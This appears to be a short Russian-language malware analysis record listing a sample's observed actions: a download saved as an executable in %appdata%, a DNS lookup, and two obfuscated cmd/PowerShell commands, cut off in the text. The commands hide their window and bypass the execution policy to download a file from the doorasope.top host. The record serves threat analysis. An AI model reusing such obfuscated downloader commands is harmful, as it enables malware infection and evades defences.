Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRSHell^.e^X^e^ -ExECuTio^n^PO^lIc^y B^yp^a^SS^ -N^OPrOFI^lE ^-^W^InD^owsTyle ^h^idd^EN (nE^w-^O^BJ^EcT s^Y^STE^M^.^NEt^.w^E^bClI^ENT^).dOWnLO^aDFILe^(^'http://www.doorasope.top/r...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoweRSHell^.e^X^e^ -ExECuTio^n^PO^lIc^y B^yp^a^SS^ -N^OPrOFI^lE ^-^W^InD^owsTyle ^h^idd^EN (nE^w-^O^BJ^EcT s^Y^STE^M^.^NEt^.w^E^bClI^ENT^).dOWnLO^aDFILe^(^'http://www.doorasope.top/r...' (со скрытым окном)